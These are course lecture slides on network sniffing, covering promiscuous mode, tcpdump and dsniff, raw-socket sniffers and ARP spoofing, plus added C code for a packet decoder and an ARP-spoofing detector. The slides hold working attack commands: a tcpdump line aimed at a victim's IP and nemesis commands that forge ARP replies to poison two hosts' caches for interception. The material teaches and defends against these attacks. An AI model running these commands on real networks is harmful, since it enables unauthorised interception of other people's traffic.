COM850 Computer Hacking and Security
0x440
Network Sniffing
Nov 27, 2014
Sangwook Lee
Table of Contents
• Network Sniffing
• Sniffing Tools
• ARP Spoofing
0X440 NETWORK SNIFFING
What is Network Sniffing?
The act of capturing packets that aren't necessarily meant for public viewing is called SNIFFING.
Two Sniffing Flows Depending on the Network Type
• Non-switched network environment
1. Setting the promiscuous mode
2. Packet-capturing
• Switched network environment
1. ARP spoofing
2. Packet-capturing
Non-switched vs. Switched Network
• The flow of traffic in a non-switched network
Step 1 Node A transmits a frame to Node C
Step 2 The hub will broadcast this frame to every active port
Step 3 Node B will receive the frame and will examine the address in the frame. After determining that it is not the intended host, it will discard the frame
Step 4 Node C will receive the frame and will examine the address in the frame. After determining that it is the intended host, it will process the frame further
It should be noted that steps 3 and 4 can be reversed in order
Non-switched vs. Switched Network
• The flow of traffic in a switched network
Step 1 Node A transmits a frame to Node C
Step 2 The switch will examine this frame and determine what the intended host is. It will then set up a connection between Node A and Node C so that they have a 'private' connection
Step 3 Node C will receive the frame and will examine the address. After determining that it is the intended host, it will process the frame further
Sniffing Non-switched Network
• For a host to be used as a sniffing agent,
– NIC must be set to the promiscuous mode
After the promiscuous mode is set, the NIC no longer drops network frames that are addressed to other hosts
Sniffing Non-switched Network
• Setting the promiscuous mode
$ sudo ifconfig eth0 promisc
Packet Capturing Tools
• Sniffers
– tcpdump
– dsniff
• Raw socket sniffer
– raw_tcpsniff
– pcap_sniff (with libpcap)
– decode_sniff (with libpcap)
Sniffer: tcpdump
$ sudo tcpdump -X 'ip host <victim IP>'
Sniffer: dsniff
$ sudo dsniff -n
Raw Socket
• A raw socket is a network socket that allows direct sending and receiving of Internet protocol packets without any protocol-specific transport layer formatting
• A raw socket is specified by using SOCK_RAW as the type
• There are multiple protocol options
– IPPROTO_TCP, IPPROTO_UDP, IPPROTO_ICMP
Raw Socket Sniffer: raw_tcpsniff
raw_tcpsniff.c
$ gcc -o raw_tcpsniff raw_tcpsniff.c
$ sudo ./raw_tcpsniff
Raw Socket Sniffer with Libpcap: pcap_sniff
pcap_sniff.c
$ gcc -o pcap_sniff pcap_sniff.c -lpcap
$ sudo ./pcap_sniff
Raw Socket Sniffer with Libpcap: decode_sniff
decode_sniff.c
$ gcc -o decode_sniff decode_sniff.c -lpcap
$ sudo ./decode_sniff
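The three sniffers above share one job once a packet arrives: walk the IPv4 and TCP headers and pull out addresses, ports, flags and the payload length. The program below is an added example written for this page, not the raw_tcpsniff.c, pcap_sniff.c or decode_sniff.c from the lecture. It opens a SOCK_RAW/IPPROTO_TCP socket the way the raw socket section describes and decodes each packet with a bounds check before every field is read, because a sniffer sees whatever the wire delivers, truncated or malformed packets included. The decoder is exercised on a constructed packet (1.1.1.10:40000 to 1.1.1.30:80, PSH|ACK, four payload bytes) so it can be checked without root.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <netinet/in.h>

struct tcp_summary {
    char src[INET_ADDRSTRLEN];
    char dst[INET_ADDRSTRLEN];
    uint16_t sport, dport;
    uint8_t flags;          /* TCP flag byte: 0x02 SYN, 0x10 ACK, 0x08 PSH, ... */
    size_t payload_len;
};

/* Decode an IPv4 packet carrying TCP, as handed over by a raw socket.
 * Returns 0 on success, -1 if the buffer is not a well-formed IPv4/TCP packet. */
int decode_tcp(const uint8_t *buf, size_t len, struct tcp_summary *out)
{
    if (len < 20) return -1;
    size_t ihl = (buf[0] & 0x0f) * 4;                    /* IP header length in bytes */
    if ((buf[0] >> 4) != 4 || ihl < 20 || len < ihl) return -1;
    size_t total = ((size_t)buf[2] << 8) | buf[3];      /* IP total length */
    if (total < ihl + 20 || total > len) return -1;      /* must hold at least a TCP header */
    if (buf[9] != IPPROTO_TCP) return -1;

    const uint8_t *tcp = buf + ihl;
    size_t doff = (tcp[12] >> 4) * 4;                    /* TCP header length in bytes */
    if (doff < 20 || ihl + doff > total) return -1;

    inet_ntop(AF_INET, buf + 12, out->src, sizeof out->src);
    inet_ntop(AF_INET, buf + 16, out->dst, sizeof out->dst);
    out->sport = (uint16_t)((tcp[0] << 8) | tcp[1]);
    out->dport = (uint16_t)((tcp[2] << 8) | tcp[3]);
    out->flags = tcp[13];
    out->payload_len = total - ihl - doff;
    return 0;
}

/* Constructed sample packet (not captured traffic): IPv4 header, TCP header, "GET ". */
const uint8_t sample_packet[] = {
    0x45, 0x00, 0x00, 0x2c, 0x00, 0x01, 0x00, 0x00, 0x40, 0x06, 0x00, 0x00,
    1, 1, 1, 10,  1, 1, 1, 30,
    0x9c, 0x40, 0x00, 0x50, 0, 0, 0, 1, 0, 0, 0, 0, 0x50, 0x18, 0xff, 0xff, 0, 0, 0, 0,
    'G', 'E', 'T', ' '
};
struct tcp_summary sample_summary;

/* Decode the constructed sample into sample_summary. */
int decode_sample(void)
{
    return decode_tcp(sample_packet, sizeof sample_packet, &sample_summary);
}

int main(void)
{
    /* raw_tcpsniff-style capture: on Linux a SOCK_RAW/IPPROTO_TCP socket receives
     * every incoming TCP packet with its IPv4 header included. Requires root. */
    int fd = socket(AF_INET, SOCK_RAW, IPPROTO_TCP);
    if (fd < 0) { perror("socket"); return 1; }
    uint8_t buf[65535];
    struct tcp_summary s;
    for (;;) {
        ssize_t n = recv(fd, buf, sizeof buf, 0);
        if (n < 0) { perror("recv"); break; }
        if (decode_tcp(buf, (size_t)n, &s) == 0)
            printf("%s:%u -> %s:%u flags=0x%02x payload=%zu\n",
                   s.src, s.sport, s.dst, s.dport, s.flags, s.payload_len);
    }
    close(fd);
    return 0;
}
```

Build with `gcc -o tcp_decode tcp_decode.c` and run it as root to watch live traffic; the same decode_tcp routine can be called from a libpcap callback, where the frame starts with a 14-byte Ethernet header that must be skipped first.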
Sniffing Switched Networks
• ARP spoofing
One of the basic operations of the Ethernet protocol revolves around ARP (Address Resolution Protocol) requests and replies. In general, when Node A wants to communicate with Node C on the network, it sends an ARP request. Node C will send an ARP reply which will include the MAC address. Even in a switched environment, this initial ARP request is sent in a broadcast manner. It is possible for Node B to craft and send an unsolicited, fake ARP reply to Node A. This fake ARP reply will specify that Node B has the MAC address of Node C. Node A will unwittingly send the traffic to Node B since it professes to have the intended MAC address.
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)
– Attacker
• IP: 1.1.1.20
• MAC: 00:00:00:BB:BB:BB
– Victim1
• IP: 1.1.1.10
• MAC: 00:00:00:AA:AA:AA
– Victim2
• IP: 1.1.1.30
• MAC: 00:00:00:CC:CC:CC
Sniffing Switched Network
• ARP spoofing using NEMESIS (cont.)
Attacker (System B) → Victim1 (System A)
$ sudo nemesis arp -v -r -d eth0 -S 1.1.1.30 -D 1.1.1.10
-h 00:00:00:BB:BB:BB -m 00:00:00:AA:AA:AA
-H 00:00:00:BB:BB:BB -M 00:00:00:AA:AA:AA
Attacker (System B) → Victim2 (System C)
$ sudo nemesis arp -v -r -d eth0 -S 1.1.1.10 -D 1.1.1.30
-h 00:00:00:BB:BB:BB -m 00:00:00:CC:CC:CC
-H 00:00:00:BB:BB:BB -M 00:00:00:CC:CC:CC
Sniffing Switched Network
• ARP spoofing using NEMESIS
ARP Cache of Victim1 (System A)
ARP Cache of Victim2 (System C)
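What the poisoned caches above look like from the wire is an IP address that suddenly answers with a different MAC. The monitor below is an added example written for this page (not from the lecture or from nemesis): it parses Ethernet/ARP frames, remembers the first sender MAC seen for each sender IP, and raises an alert when a later reply maps that IP to another MAC. It serves both the ARP spoofing description and the nemesis demonstration: the scenario routine replays a genuine reply from 1.1.1.30 (00:00:00:CC:CC:CC) followed by the forged reply that the first nemesis command sends, using constructed frames rather than a live capture; feeding it from a pcap_loop callback is left out.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

#define ETH_HLEN  14
#define ARP_HLEN  28
#define MAX_HOSTS 64

struct binding { uint8_t ip[4]; uint8_t mac[6]; };
struct arp_monitor { struct binding seen[MAX_HOSTS]; int count; };

enum { ARP_IGNORED = 0, ARP_LEARNED = 1, ARP_CONSISTENT = 2, ARP_CONFLICT = 3 };

/* If the frame is an IPv4-over-Ethernet ARP reply, copy the sender's
 * protocol and hardware addresses and return 1; otherwise return 0. */
int parse_arp_reply(const uint8_t *f, size_t len, uint8_t ip[4], uint8_t mac[6])
{
    if (len < ETH_HLEN + ARP_HLEN) return 0;
    if (f[12] != 0x08 || f[13] != 0x06) return 0;     /* EtherType 0x0806 = ARP */
    const uint8_t *a = f + ETH_HLEN;
    if (a[0] != 0 || a[1] != 1) return 0;             /* HTYPE 1 = Ethernet */
    if (a[2] != 0x08 || a[3] != 0x00) return 0;       /* PTYPE 0x0800 = IPv4 */
    if (a[4] != 6 || a[5] != 4) return 0;             /* HLEN 6, PLEN 4 */
    if (a[6] != 0 || a[7] != 2) return 0;             /* opcode 2 = reply */
    memcpy(mac, a + 8, 6);                            /* sender hardware address */
    memcpy(ip, a + 14, 4);                            /* sender protocol address */
    return 1;
}

static void print_alert(const uint8_t ip[4], const uint8_t old[6], const uint8_t cur[6])
{
    fprintf(stderr, "ALERT: %u.%u.%u.%u was %02x:%02x:%02x:%02x:%02x:%02x, "
            "now claims %02x:%02x:%02x:%02x:%02x:%02x\n",
            ip[0], ip[1], ip[2], ip[3], old[0], old[1], old[2], old[3], old[4], old[5],
            cur[0], cur[1], cur[2], cur[3], cur[4], cur[5]);
}

/* Feed one captured frame to the monitor. The first reply for an IP is learned;
 * a later reply mapping the same IP to a different MAC is the signature of the
 * cache poisoning described above and is reported as a conflict. */
int arp_monitor_observe(struct arp_monitor *m, const uint8_t *f, size_t len)
{
    uint8_t ip[4], mac[6];
    if (!parse_arp_reply(f, len, ip, mac)) return ARP_IGNORED;
    for (int i = 0; i < m->count; i++) {
        if (memcmp(m->seen[i].ip, ip, 4) != 0) continue;
        if (memcmp(m->seen[i].mac, mac, 6) == 0) return ARP_CONSISTENT;
        print_alert(ip, m->seen[i].mac, mac);
        return ARP_CONFLICT;
    }
    if (m->count == MAX_HOSTS) return ARP_IGNORED;   /* table full; a real tool would evict */
    memcpy(m->seen[m->count].ip, ip, 4);
    memcpy(m->seen[m->count].mac, mac, 6);
    m->count++;
    return ARP_LEARNED;
}

/* Build a constructed ARP reply frame (sender -> target); returns its length, 42. */
size_t build_arp_reply(uint8_t *out, const uint8_t smac[6], const uint8_t sip[4],
                       const uint8_t tmac[6], const uint8_t tip[4])
{
    static const uint8_t hdr[8] = { 0, 1, 0x08, 0x00, 6, 4, 0, 2 };
    memcpy(out, tmac, 6); memcpy(out + 6, smac, 6);
    out[12] = 0x08; out[13] = 0x06;
    memcpy(out + 14, hdr, 8);
    memcpy(out + 22, smac, 6); memcpy(out + 28, sip, 4);
    memcpy(out + 32, tmac, 6); memcpy(out + 38, tip, 4);
    return ETH_HLEN + ARP_HLEN;
}

/* Verdicts for: genuine reply, the same reply again, the forged reply. */
int verdicts[3];

/* Replay the slides' scenario with constructed frames; returns the forged reply's verdict. */
int run_scenario(void)
{
    const uint8_t mac_a[6] = {0, 0, 0, 0xAA, 0xAA, 0xAA};   /* Victim1 */
    const uint8_t mac_b[6] = {0, 0, 0, 0xBB, 0xBB, 0xBB};   /* Attacker */
    const uint8_t mac_c[6] = {0, 0, 0, 0xCC, 0xCC, 0xCC};   /* Victim2 */
    const uint8_t ip_a[4] = {1, 1, 1, 10}, ip_c[4] = {1, 1, 1, 30};
    struct arp_monitor m = { .count = 0 };
    uint8_t frame[64];
    size_t n;
    n = build_arp_reply(frame, mac_c, ip_c, mac_a, ip_a);   /* genuine: C answers A */
    verdicts[0] = arp_monitor_observe(&m, frame, n);
    verdicts[1] = arp_monitor_observe(&m, frame, n);        /* same binding again */
    n = build_arp_reply(frame, mac_b, ip_c, mac_a, ip_a);   /* forged: B claims C's IP */
    verdicts[2] = arp_monitor_observe(&m, frame, n);
    return verdicts[2];
}

int main(void)
{
    printf("forged reply verdict: %d (3 = conflict)\n", run_scenario());
    return 0;
}
```

The same binding table is what static ARP entries (arp -s) or switch-side Dynamic ARP Inspection enforce; a monitor like this one only detects the change, it does not stop it.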
the end